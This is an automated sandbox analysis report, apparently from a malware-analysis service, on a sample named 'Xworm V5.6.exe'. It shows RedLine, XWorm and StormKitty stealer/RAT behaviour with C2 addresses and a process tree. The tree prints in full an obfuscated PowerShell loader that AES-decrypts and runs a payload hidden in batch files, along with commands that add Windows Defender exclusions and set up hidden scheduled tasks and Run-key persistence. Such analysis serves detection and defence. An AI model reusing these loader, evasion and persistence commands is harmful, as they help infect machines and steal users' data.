redline | 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727

Analysis

max time kernel
117s
max time network
121s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
29-06-2024 16:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Xworm V5.6.exe
Size

15.6MB
MD5

ad3893ee2a8e40f2700236672635f5aa
SHA1

80f3c0bc398c473e32eeb1420218be6a5feb291d
SHA256

1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727
SHA512

748db720695d028c034367f0af26d80ced9700dc497a82ce5a4ce578b39fb24c0f869ddbae3b542b15718523fa3cd29c11f78ded0f9f748ac4954256472a4111
SSDEEP

196608:IZu1YQGj4ZSo3jXkpiliRElNhT7kiibJ488hEipzLmCKg4EFJ9UHytjAIgwX4FVE:+u1OjJEIZulNyHytjma0VvjZ6

Score

10^/10

redline sectoprat stormkitty xworm cracked execution infostealer persistence rat stealer trojan

Malware Config

Extracted

Family

redline

Botnet

cracked

94.156.8.186:37552

Extracted

Family

xworm

94.156.8.186:7000

Attributes

Install_directory
%AppData%
install_file
svchost.exe

Signatures

Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource yara_rule

behavioral2/memory/1964-348-0x000000000AD10000-0x000000000AD1E000-memory.dmp disable_win_def
Detect Xworm Payload 1 IoCs

Processes:

resource yara_rule

behavioral2/memory/1964-258-0x0000000004F10000-0x0000000004F26000-memory.dmp family_xworm
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
RedLine payload 1 IoCs

Processes:

resource yara_rule

behavioral2/memory/484-251-0x00000000053E0000-0x00000000053FE000-memory.dmp family_redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat
SectopRAT payload 1 IoCs

Processes:

resource yara_rule

behavioral2/memory/484-251-0x00000000053E0000-0x00000000053FE000-memory.dmp family_sectoprat
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty
StormKitty payload 1 IoCs

Processes:

resource yara_rule

behavioral2/memory/1964-347-0x000000000AB70000-0x000000000AC8E000-memory.dmp family_stormkitty
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

4320 powershell.exe
4116 powershell.exe
3928 powershell.exe
3148 powershell.exe
3488 powershell.exe
4340 powershell.exe
908 powershell.exe
Executes dropped EXE 5 IoCs

Processes:

Xworm V5.6.exexworm.bat.exexfixer.bat.exestartup_str_355.bat.exestartup_str_550.bat.exe

pid process

4084 Xworm V5.6.exe
744 xworm.bat.exe
2216 xfixer.bat.exe
484 startup_str_355.bat.exe
1964 startup_str_550.bat.exe

resource	yara_rule
behavioral2/memory/1964-348-0x000000000AD10000-0x000000000AD1E000-memory.dmp	disable_win_def

resource	yara_rule
behavioral2/memory/1964-258-0x0000000004F10000-0x0000000004F26000-memory.dmp	family_xworm

resource	yara_rule
behavioral2/memory/484-251-0x00000000053E0000-0x00000000053FE000-memory.dmp	family_redline

resource	yara_rule
behavioral2/memory/484-251-0x00000000053E0000-0x00000000053FE000-memory.dmp	family_sectoprat

resource	yara_rule
behavioral2/memory/1964-347-0x000000000AB70000-0x000000000AC8E000-memory.dmp	family_stormkitty

pid	process
4320	powershell.exe
4116	powershell.exe
3928	powershell.exe
3148	powershell.exe
3488	powershell.exe
4340	powershell.exe
908	powershell.exe

pid	process
4084	Xworm V5.6.exe
744	xworm.bat.exe
2216	xfixer.bat.exe
484	startup_str_355.bat.exe
1964	startup_str_550.bat.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

startup_str_550.bat.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe"	startup_str_550.bat.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

2 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
2	ip-api.com

Modifies registry class 3 IoCs

Processes:

xfixer.bat.exexworm.bat.exeMiniSearchHost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings	xfixer.bat.exe
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings	xworm.bat.exe
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

startup_str_550.bat.exe

pid process

1964 startup_str_550.bat.exe

pid	process
1964	startup_str_550.bat.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

Processes:

powershell.exexworm.bat.exexfixer.bat.exepowershell.exepowershell.exepowershell.exepowershell.exestartup_str_355.bat.exestartup_str_550.bat.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3488	powershell.exe
3488	powershell.exe
744	xworm.bat.exe
744	xworm.bat.exe
2216	xfixer.bat.exe
2216	xfixer.bat.exe
1924	powershell.exe
1924	powershell.exe
4216	powershell.exe
4216	powershell.exe
908	powershell.exe
4340	powershell.exe
908	powershell.exe
4340	powershell.exe
484	startup_str_355.bat.exe
1964	startup_str_550.bat.exe
484	startup_str_355.bat.exe
1964	startup_str_550.bat.exe
1044	powershell.exe
1044	powershell.exe
2824	powershell.exe
2824	powershell.exe
4320	powershell.exe
4320	powershell.exe
4116	powershell.exe
4116	powershell.exe
3928	powershell.exe
3928	powershell.exe
3148	powershell.exe
3148	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exexworm.bat.exexfixer.bat.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3488	powershell.exe
Token: SeDebugPrivilege	744	xworm.bat.exe
Token: SeDebugPrivilege	2216	xfixer.bat.exe
Token: SeDebugPrivilege	1924	powershell.exe
Token: SeDebugPrivilege	4216	powershell.exe
Token: SeIncreaseQuotaPrivilege	1924	powershell.exe
Token: SeSecurityPrivilege	1924	powershell.exe
Token: SeTakeOwnershipPrivilege	1924	powershell.exe
Token: SeLoadDriverPrivilege	1924	powershell.exe
Token: SeSystemProfilePrivilege	1924	powershell.exe
Token: SeSystemtimePrivilege	1924	powershell.exe
Token: SeProfSingleProcessPrivilege	1924	powershell.exe
Token: SeIncBasePriorityPrivilege	1924	powershell.exe
Token: SeCreatePagefilePrivilege	1924	powershell.exe
Token: SeBackupPrivilege	1924	powershell.exe
Token: SeRestorePrivilege	1924	powershell.exe
Token: SeShutdownPrivilege	1924	powershell.exe
Token: SeDebugPrivilege	1924	powershell.exe
Token: SeSystemEnvironmentPrivilege	1924	powershell.exe
Token: SeRemoteShutdownPrivilege	1924	powershell.exe
Token: SeUndockPrivilege	1924	powershell.exe
Token: SeManageVolumePrivilege	1924	powershell.exe
Token: 33	1924	powershell.exe
Token: 34	1924	powershell.exe
Token: 35	1924	powershell.exe
Token: 36	1924	powershell.exe
Token: SeIncreaseQuotaPrivilege	4216	powershell.exe
Token: SeSecurityPrivilege	4216	powershell.exe
Token: SeTakeOwnershipPrivilege	4216	powershell.exe
Token: SeLoadDriverPrivilege	4216	powershell.exe
Token: SeSystemProfilePrivilege	4216	powershell.exe
Token: SeSystemtimePrivilege	4216	powershell.exe
Token: SeProfSingleProcessPrivilege	4216	powershell.exe
Token: SeIncBasePriorityPrivilege	4216	powershell.exe
Token: SeCreatePagefilePrivilege	4216	powershell.exe
Token: SeBackupPrivilege	4216	powershell.exe
Token: SeRestorePrivilege	4216	powershell.exe
Token: SeShutdownPrivilege	4216	powershell.exe
Token: SeDebugPrivilege	4216	powershell.exe
Token: SeSystemEnvironmentPrivilege	4216	powershell.exe
Token: SeRemoteShutdownPrivilege	4216	powershell.exe
Token: SeUndockPrivilege	4216	powershell.exe
Token: SeManageVolumePrivilege	4216	powershell.exe
Token: 33	4216	powershell.exe
Token: 34	4216	powershell.exe
Token: 35	4216	powershell.exe
Token: 36	4216	powershell.exe
Token: SeDebugPrivilege	908	powershell.exe
Token: SeDebugPrivilege	4340	powershell.exe
Token: SeIncreaseQuotaPrivilege	908	powershell.exe
Token: SeSecurityPrivilege	908	powershell.exe
Token: SeTakeOwnershipPrivilege	908	powershell.exe
Token: SeLoadDriverPrivilege	908	powershell.exe
Token: SeSystemProfilePrivilege	908	powershell.exe
Token: SeSystemtimePrivilege	908	powershell.exe
Token: SeProfSingleProcessPrivilege	908	powershell.exe
Token: SeIncBasePriorityPrivilege	908	powershell.exe
Token: SeCreatePagefilePrivilege	908	powershell.exe
Token: SeBackupPrivilege	908	powershell.exe
Token: SeRestorePrivilege	908	powershell.exe
Token: SeShutdownPrivilege	908	powershell.exe
Token: SeDebugPrivilege	908	powershell.exe
Token: SeSystemEnvironmentPrivilege	908	powershell.exe
Token: SeRemoteShutdownPrivilege	908	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

MiniSearchHost.exe

pid process

4632 MiniSearchHost.exe

pid	process
4632	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Xworm V5.6.execmd.execmd.exexworm.bat.exexfixer.bat.exeWScript.exeWScript.execmd.execmd.exestartup_str_355.bat.exestartup_str_550.bat.exe

description	pid	process	target process
PID 1972 wrote to memory of 3488	1972	Xworm V5.6.exe	powershell.exe
PID 1972 wrote to memory of 3488	1972	Xworm V5.6.exe	powershell.exe
PID 1972 wrote to memory of 3488	1972	Xworm V5.6.exe	powershell.exe
PID 1972 wrote to memory of 1984	1972	Xworm V5.6.exe	cmd.exe
PID 1972 wrote to memory of 1984	1972	Xworm V5.6.exe	cmd.exe
PID 1972 wrote to memory of 1984	1972	Xworm V5.6.exe	cmd.exe
PID 1972 wrote to memory of 2992	1972	Xworm V5.6.exe	cmd.exe
PID 1972 wrote to memory of 2992	1972	Xworm V5.6.exe	cmd.exe
PID 1972 wrote to memory of 2992	1972	Xworm V5.6.exe	cmd.exe
PID 1972 wrote to memory of 4084	1972	Xworm V5.6.exe	Xworm V5.6.exe
PID 1972 wrote to memory of 4084	1972	Xworm V5.6.exe	Xworm V5.6.exe
PID 1984 wrote to memory of 744	1984	cmd.exe	xworm.bat.exe
PID 1984 wrote to memory of 744	1984	cmd.exe	xworm.bat.exe
PID 1984 wrote to memory of 744	1984	cmd.exe	xworm.bat.exe
PID 2992 wrote to memory of 2216	2992	cmd.exe	xfixer.bat.exe
PID 2992 wrote to memory of 2216	2992	cmd.exe	xfixer.bat.exe
PID 2992 wrote to memory of 2216	2992	cmd.exe	xfixer.bat.exe
PID 744 wrote to memory of 1924	744	xworm.bat.exe	powershell.exe
PID 744 wrote to memory of 1924	744	xworm.bat.exe	powershell.exe
PID 744 wrote to memory of 1924	744	xworm.bat.exe	powershell.exe
PID 2216 wrote to memory of 4216	2216	xfixer.bat.exe	powershell.exe
PID 2216 wrote to memory of 4216	2216	xfixer.bat.exe	powershell.exe
PID 2216 wrote to memory of 4216	2216	xfixer.bat.exe	powershell.exe
PID 744 wrote to memory of 908	744	xworm.bat.exe	powershell.exe
PID 744 wrote to memory of 908	744	xworm.bat.exe	powershell.exe
PID 744 wrote to memory of 908	744	xworm.bat.exe	powershell.exe
PID 2216 wrote to memory of 4340	2216	xfixer.bat.exe	powershell.exe
PID 2216 wrote to memory of 4340	2216	xfixer.bat.exe	powershell.exe
PID 2216 wrote to memory of 4340	2216	xfixer.bat.exe	powershell.exe
PID 744 wrote to memory of 440	744	xworm.bat.exe	WScript.exe
PID 744 wrote to memory of 440	744	xworm.bat.exe	WScript.exe
PID 744 wrote to memory of 440	744	xworm.bat.exe	WScript.exe
PID 2216 wrote to memory of 3628	2216	xfixer.bat.exe	WScript.exe
PID 2216 wrote to memory of 3628	2216	xfixer.bat.exe	WScript.exe
PID 2216 wrote to memory of 3628	2216	xfixer.bat.exe	WScript.exe
PID 440 wrote to memory of 2108	440	WScript.exe	cmd.exe
PID 440 wrote to memory of 2108	440	WScript.exe	cmd.exe
PID 440 wrote to memory of 2108	440	WScript.exe	cmd.exe
PID 3628 wrote to memory of 2576	3628	WScript.exe	cmd.exe
PID 3628 wrote to memory of 2576	3628	WScript.exe	cmd.exe
PID 3628 wrote to memory of 2576	3628	WScript.exe	cmd.exe
PID 2108 wrote to memory of 484	2108	cmd.exe	startup_str_355.bat.exe
PID 2108 wrote to memory of 484	2108	cmd.exe	startup_str_355.bat.exe
PID 2108 wrote to memory of 484	2108	cmd.exe	startup_str_355.bat.exe
PID 2576 wrote to memory of 1964	2576	cmd.exe	startup_str_550.bat.exe
PID 2576 wrote to memory of 1964	2576	cmd.exe	startup_str_550.bat.exe
PID 2576 wrote to memory of 1964	2576	cmd.exe	startup_str_550.bat.exe
PID 484 wrote to memory of 1044	484	startup_str_355.bat.exe	powershell.exe
PID 484 wrote to memory of 1044	484	startup_str_355.bat.exe	powershell.exe
PID 484 wrote to memory of 1044	484	startup_str_355.bat.exe	powershell.exe
PID 1964 wrote to memory of 2824	1964	startup_str_550.bat.exe	powershell.exe
PID 1964 wrote to memory of 2824	1964	startup_str_550.bat.exe	powershell.exe
PID 1964 wrote to memory of 2824	1964	startup_str_550.bat.exe	powershell.exe
PID 1964 wrote to memory of 4320	1964	startup_str_550.bat.exe	powershell.exe
PID 1964 wrote to memory of 4320	1964	startup_str_550.bat.exe	powershell.exe
PID 1964 wrote to memory of 4320	1964	startup_str_550.bat.exe	powershell.exe
PID 1964 wrote to memory of 4116	1964	startup_str_550.bat.exe	powershell.exe
PID 1964 wrote to memory of 4116	1964	startup_str_550.bat.exe	powershell.exe
PID 1964 wrote to memory of 4116	1964	startup_str_550.bat.exe	powershell.exe
PID 1964 wrote to memory of 3928	1964	startup_str_550.bat.exe	powershell.exe
PID 1964 wrote to memory of 3928	1964	startup_str_550.bat.exe	powershell.exe
PID 1964 wrote to memory of 3928	1964	startup_str_550.bat.exe	powershell.exe
PID 1964 wrote to memory of 3148	1964	startup_str_550.bat.exe	powershell.exe
PID 1964 wrote to memory of 3148	1964	startup_str_550.bat.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe
"C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1972

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AdABsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAbgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdQBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAdQBpACMAPgA="
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\xworm.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1984

C:\Users\Admin\AppData\Roaming\xworm.bat.exe
"xworm.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_TxKiz = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\xworm.bat').Split([Environment]::NewLine);foreach ($_CASH_XMOQm in $_CASH_TxKiz) { if ($_CASH_XMOQm.StartsWith(':: @')) { $_CASH_ssYCl = $_CASH_XMOQm.Substring(4); break; }; };$_CASH_ssYCl = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ssYCl, '_CASH_', '');$_CASH_CfCmx = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ssYCl);$_CASH_tsEof = New-Object System.Security.Cryptography.AesManaged;$_CASH_tsEof.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_tsEof.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_tsEof.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+ZLOxcnfG7i9YTWJ7vLTmQj82ou3KT503uJ1I+7Wo6U=');$_CASH_tsEof.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/z4iXtMuBf06DnNNej/bVw==');$_CASH_KWHai = $_CASH_tsEof.CreateDecryptor();$_CASH_CfCmx = $_CASH_KWHai.TransformFinalBlock($_CASH_CfCmx, 0, $_CASH_CfCmx.Length);$_CASH_KWHai.Dispose();$_CASH_tsEof.Dispose();$_CASH_fYpGJ = New-Object System.IO.MemoryStream(, $_CASH_CfCmx);$_CASH_FImSp = New-Object System.IO.MemoryStream;$_CASH_aydNz = New-Object System.IO.Compression.GZipStream($_CASH_fYpGJ, [IO.Compression.CompressionMode]::Decompress);$_CASH_aydNz.CopyTo($_CASH_FImSp);$_CASH_aydNz.Dispose();$_CASH_fYpGJ.Dispose();$_CASH_FImSp.Dispose();$_CASH_CfCmx = $_CASH_FImSp.ToArray();$_CASH_MWQwC = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_CfCmx);$_CASH_eABCx = $_CASH_MWQwC.EntryPoint;$_CASH_eABCx.Invoke($null, (, [string[]] ('')))
3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:744

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\xworm')
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1924

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_355_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_355.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:908

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_355.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:440

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_355.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:2108

C:\Users\Admin\AppData\Roaming\startup_str_355.bat.exe
"startup_str_355.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_TxKiz = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_355.bat').Split([Environment]::NewLine);foreach ($_CASH_XMOQm in $_CASH_TxKiz) { if ($_CASH_XMOQm.StartsWith(':: @')) { $_CASH_ssYCl = $_CASH_XMOQm.Substring(4); break; }; };$_CASH_ssYCl = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ssYCl, '_CASH_', '');$_CASH_CfCmx = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ssYCl);$_CASH_tsEof = New-Object System.Security.Cryptography.AesManaged;$_CASH_tsEof.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_tsEof.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_tsEof.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+ZLOxcnfG7i9YTWJ7vLTmQj82ou3KT503uJ1I+7Wo6U=');$_CASH_tsEof.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/z4iXtMuBf06DnNNej/bVw==');$_CASH_KWHai = $_CASH_tsEof.CreateDecryptor();$_CASH_CfCmx = $_CASH_KWHai.TransformFinalBlock($_CASH_CfCmx, 0, $_CASH_CfCmx.Length);$_CASH_KWHai.Dispose();$_CASH_tsEof.Dispose();$_CASH_fYpGJ = New-Object System.IO.MemoryStream(, $_CASH_CfCmx);$_CASH_FImSp = New-Object System.IO.MemoryStream;$_CASH_aydNz = New-Object System.IO.Compression.GZipStream($_CASH_fYpGJ, [IO.Compression.CompressionMode]::Decompress);$_CASH_aydNz.CopyTo($_CASH_FImSp);$_CASH_aydNz.Dispose();$_CASH_fYpGJ.Dispose();$_CASH_FImSp.Dispose();$_CASH_CfCmx = $_CASH_FImSp.ToArray();$_CASH_MWQwC = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_CfCmx);$_CASH_eABCx = $_CASH_MWQwC.EntryPoint;$_CASH_eABCx.Invoke($null, (, [string[]] ('')))
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:484

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_355')
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:1044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\xfixer.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:2992

C:\Users\Admin\AppData\Roaming\xfixer.bat.exe
"xfixer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_CnGzR = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\xfixer.bat').Split([Environment]::NewLine);foreach ($_CASH_qdZmU in $_CASH_CnGzR) { if ($_CASH_qdZmU.StartsWith(':: @')) { $_CASH_ZoWEj = $_CASH_qdZmU.Substring(4); break; }; };$_CASH_ZoWEj = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZoWEj, '_CASH_', '');$_CASH_fXadG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZoWEj);$_CASH_HMtAt = New-Object System.Security.Cryptography.AesManaged;$_CASH_HMtAt.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_HMtAt.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_HMtAt.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fIynBYcBUpBBez+nt2djmwJqlIyvat7HzgVRpfM2ODQ=');$_CASH_HMtAt.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+5/SuT9a8EJc5rjsiLxvRg==');$_CASH_tRKDk = $_CASH_HMtAt.CreateDecryptor();$_CASH_fXadG = $_CASH_tRKDk.TransformFinalBlock($_CASH_fXadG, 0, $_CASH_fXadG.Length);$_CASH_tRKDk.Dispose();$_CASH_HMtAt.Dispose();$_CASH_xnUdL = New-Object System.IO.MemoryStream(, $_CASH_fXadG);$_CASH_gkSYz = New-Object System.IO.MemoryStream;$_CASH_UMTAN = New-Object System.IO.Compression.GZipStream($_CASH_xnUdL, [IO.Compression.CompressionMode]::Decompress);$_CASH_UMTAN.CopyTo($_CASH_gkSYz);$_CASH_UMTAN.Dispose();$_CASH_xnUdL.Dispose();$_CASH_gkSYz.Dispose();$_CASH_fXadG = $_CASH_gkSYz.ToArray();$_CASH_lwuuH = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_fXadG);$_CASH_pYHCE = $_CASH_lwuuH.EntryPoint;$_CASH_pYHCE.Invoke($null, (, [string[]] ('')))
3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2216

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\xfixer')
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4216

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_550_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_550.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4340

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_550.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:3628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_550.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:2576

C:\Users\Admin\AppData\Roaming\startup_str_550.bat.exe
"startup_str_550.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_CnGzR = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_550.bat').Split([Environment]::NewLine);foreach ($_CASH_qdZmU in $_CASH_CnGzR) { if ($_CASH_qdZmU.StartsWith(':: @')) { $_CASH_ZoWEj = $_CASH_qdZmU.Substring(4); break; }; };$_CASH_ZoWEj = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZoWEj, '_CASH_', '');$_CASH_fXadG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZoWEj);$_CASH_HMtAt = New-Object System.Security.Cryptography.AesManaged;$_CASH_HMtAt.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_HMtAt.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_HMtAt.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fIynBYcBUpBBez+nt2djmwJqlIyvat7HzgVRpfM2ODQ=');$_CASH_HMtAt.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+5/SuT9a8EJc5rjsiLxvRg==');$_CASH_tRKDk = $_CASH_HMtAt.CreateDecryptor();$_CASH_fXadG = $_CASH_tRKDk.TransformFinalBlock($_CASH_fXadG, 0, $_CASH_fXadG.Length);$_CASH_tRKDk.Dispose();$_CASH_HMtAt.Dispose();$_CASH_xnUdL = New-Object System.IO.MemoryStream(, $_CASH_fXadG);$_CASH_gkSYz = New-Object System.IO.MemoryStream;$_CASH_UMTAN = New-Object System.IO.Compression.GZipStream($_CASH_xnUdL, [IO.Compression.CompressionMode]::Decompress);$_CASH_UMTAN.CopyTo($_CASH_gkSYz);$_CASH_UMTAN.Dispose();$_CASH_xnUdL.Dispose();$_CASH_gkSYz.Dispose();$_CASH_fXadG = $_CASH_gkSYz.ToArray();$_CASH_lwuuH = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_fXadG);$_CASH_pYHCE = $_CASH_lwuuH.EntryPoint;$_CASH_pYHCE.Invoke($null, (, [string[]] ('')))
6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1964

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_550')
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:2824

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\startup_str_550.bat'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4320

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'startup_str_550.bat.exe'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4116

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
